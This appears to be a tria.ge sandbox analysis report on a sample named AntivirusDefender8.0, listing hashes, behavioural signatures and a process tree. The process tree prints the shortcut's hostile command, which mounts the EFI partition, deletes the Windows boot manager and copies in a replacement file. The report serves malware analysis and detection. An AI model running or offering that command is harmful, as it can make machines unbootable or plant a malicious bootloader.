Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
7Static
static
3AntivirusD...in.zip
windows7-x64
7AntivirusD...in.zip
windows10-2004-x64
1AntivirusD...ibutes
windows7-x64
3AntivirusD...ibutes
windows10-2004-x64
3AntivirusD....0.lnk
windows7-x64
3AntivirusD....0.lnk
windows10-2004-x64
7AntivirusD...ICENSE
windows7-x64
1AntivirusD...ICENSE
windows10-2004-x64
1AntivirusD...DME.md
windows7-x64
3AntivirusD...DME.md
windows10-2004-x64
3AntivirusD...ST.exe
windows7-x64
1AntivirusD...ST.exe
windows10-2004-x64
1AntivirusD...fw.dll
windows7-x64
1AntivirusD...fw.dll
windows10-2004-x64
1Resubmissions
08/07/2024, 11:05
240708-m639fsyaph 408/07/2024, 11:00
240708-m359msxhrf 308/07/2024, 10:54
240708-mzmm5avgrj 308/07/2024, 10:49
240708-mw431axfra 708/07/2024, 10:46
240708-mtxwxaxfjc 308/07/2024, 10:42
240708-mrn6zsxekb 7Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08/07/2024, 10:42
Static task
static1
Behavioral task
behavioral1
Sample
AntivirusDefender8.0-main.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
AntivirusDefender8.0-main.zip
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
AntivirusDefender8.0-main/.gitattributes
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
AntivirusDefender8.0-main/.gitattributes
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
AntivirusDefender8.0-main/AntivirusDefender8.0.lnk
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
AntivirusDefender8.0-main/AntivirusDefender8.0.lnk
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
AntivirusDefender8.0-main/LICENSE
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
AntivirusDefender8.0-main/LICENSE
Resource
win10v2004-20240704-en
Behavioral task
behavioral9
Sample
AntivirusDefender8.0-main/README.md
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
AntivirusDefender8.0-main/README.md
Resource
win10v2004-20240704-en
Behavioral task
behavioral11
Sample
AntivirusDefender8.0-main/RUNTHISFIRST.exe
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
AntivirusDefender8.0-main/RUNTHISFIRST.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
AntivirusDefender8.0-main/bootmgfw.dll
Resource
win7-20240705-en
Behavioral task
behavioral14
Sample
AntivirusDefender8.0-main/bootmgfw.dll
Resource
win10v2004-20240704-en
General
-
Target
AntivirusDefender8.0-main/AntivirusDefender8.0.lnk
-
Size
1KB
-
MD5
3da7e181e7e2a7cb91b92cdaf0300c5b
-
SHA1
8d9691891d52d9ae7acbce140e49653d7225e5cd
-
SHA256
da6227b4b97a7b3de4abdf570873eedf44192180eb142bfabf91916fefefb41a
-
SHA512
cca8d154c6764a44914368af05259e35bf60dbc9b09b3842564521ecd99c9023b091113d9adebe7a868f2b96ef3542570bb3b2fca1bff35a15c27b837ad00296
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1576 wrote to memory of 2092 1576 cmd.exe 83 PID 1576 wrote to memory of 2092 1576 cmd.exe 83 PID 2092 wrote to memory of 1424 2092 cmd.exe 84 PID 2092 wrote to memory of 1424 2092 cmd.exe 84 PID 1424 wrote to memory of 3568 1424 cmd.exe 86 PID 1424 wrote to memory of 3568 1424 cmd.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\AntivirusDefender8.0.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""2⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\system32\cmd.execmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"3⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\mountvol.exemountvol x: /s4⤵PID:3568
-
-
-